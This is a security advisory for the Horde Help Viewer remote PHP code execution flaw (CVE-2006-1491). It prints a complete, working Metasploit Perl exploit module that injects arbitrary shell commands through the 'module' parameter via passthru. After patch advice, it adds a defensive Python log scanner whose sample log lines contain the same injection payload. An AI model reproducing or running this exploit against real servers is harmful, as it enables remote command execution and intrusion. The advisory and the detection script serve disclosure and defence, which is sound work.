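Horde Help Viewer Remote PHP Code Execution Vulnerability
Release date: 2006-05-30
Update date: 2006-07-02
Affected systems:
Horde Horde 3.0.9
Horde Horde 3.0.8
Horde Horde 3.0.7
Horde Horde 3.0.6
Horde Horde 3.0.5
Horde Horde 3.0.4
Horde Horde 3.0.3
Horde Horde 3.0.2
Horde Horde 3.0.1
Horde Horde 3.0
Unaffected systems:
Horde Horde 3.1.1
Horde Horde 3.0.10
Description:
BUGTRAQ ID: 17292
CVE(CAN) ID: CVE-2006-1491
Horde is a PHP-based framework for building web applications.
The Horde Webmail application has an input validation flaw in the way it handles user requests. A remote attacker may exploit this flaw to execute arbitrary commands on the server with the privileges of the web process.
Because of an implementation problem in the Horde Help Viewer module code, a remote attacker can inject PHP code directly into a CGI parameter and have it executed on the server.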
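Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!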
# Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability
# Name: horde_help_module.pm
# License: Artistic/BSD/GPL
# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
#
## Coded by Inkubus <inkubus@inbox.lv>
package Msf::Exploit::horde_help_module;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'Horde help viewer module remote PHP code execution',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'inkubus < inkubus [at] inbox.lv >' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an arbitrary PHP code execution flaw in the Horde web
mail software. This vulnerability is only present in the "Help Viewer Module".
Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable.
}),
'Refs' =>
[
['OSVDB', '15945'],
['CVE', '2006-1491'],
],
'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},
'Keys' => ['horde'],
'DisclosureDate' => 'Mar 28 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;
# Add an echo on each end for easy output capturing
$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";
# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
# Create the get request data
#my $data = "?do=page&template={\${passthru($byte)}}";
my $data = "?show=about&module=;\".passthru($byte);'.";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError){
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious Horde request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
my $out = $1;
$out =~ s/^\s+|\s+$//gs;
if ($out) {
$self->PrintLine('----------------------------------------');
$self->PrintLine('');
$self->PrintLine($out);
$self->PrintLine('');
$self->PrintLine('----------------------------------------');
}
}
return;
}
1;
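Recommendation:
Vendor patch:
Horde
-----
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:
http://www.horde.org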
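To check whether a server was probed before the upgrade, web access logs can be reviewed for help viewer requests whose module parameter holds anything other than a plain module name. The Python script below is an added example, not part of the original advisory or of Horde's code. It assumes Apache combined-format logs and that legitimate module names contain only letters, digits, underscores and hyphens; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined style, not from a real server).
SAMPLE_LOG = r"""
192.0.2.10 - - [30/May/2006:10:00:00 +0000] "GET /horde/services/help/?show=about&module=horde HTTP/1.1" 200 5120
198.51.100.7 - - [30/May/2006:10:00:05 +0000] "GET /horde/services/help/?show=about&module=;\".passthru(chr(88));'. HTTP/1.1" 200 811
198.51.100.7 - - [30/May/2006:10:00:09 +0000] "GET /horde/services/help/?module=%3B%22.passthru%28chr%2888%29%29&show=about HTTP/1.1" 200 790
192.0.2.11 - - [30/May/2006:10:01:00 +0000] "GET /horde/imp/mailbox.php?page=2 HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
HELP_PATH = "/services/help/"  # help viewer location, as in the default path shown on the page
# Assumption: a legitimate module name is a short identifier such as "horde".
SAFE_MODULE = re.compile(r"[A-Za-z0-9_-]*")


def module_values(query):
    """Yield the decoded value of every 'module' parameter in a query string.

    The query is split on '&' only, so a ';' inside the value stays part of it.
    """
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "module":
            yield unquote_plus(value)


def find_suspicious(log_text):
    """Return (client_ip, status, module_value) for help viewer requests
    whose module parameter fails the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or unparseable line
        path, _, query = m.group("target").partition("?")
        if HELP_PATH not in unquote_plus(path):
            continue  # only the help viewer is in scope here
        for value in module_values(query):
            if not SAFE_MODULE.fullmatch(value):
                hits.append((m.group("ip"), m.group("status"), value))
    return hits


if __name__ == "__main__":
    for ip, status, value in find_suspicious(SAMPLE_LOG):
        print(f"{ip} status={status} module={value!r}")
```

Apache writes a literal double quote in the request line as `\"`, which is why the second sample line contains a backslash; the allowlist rejects the value either way.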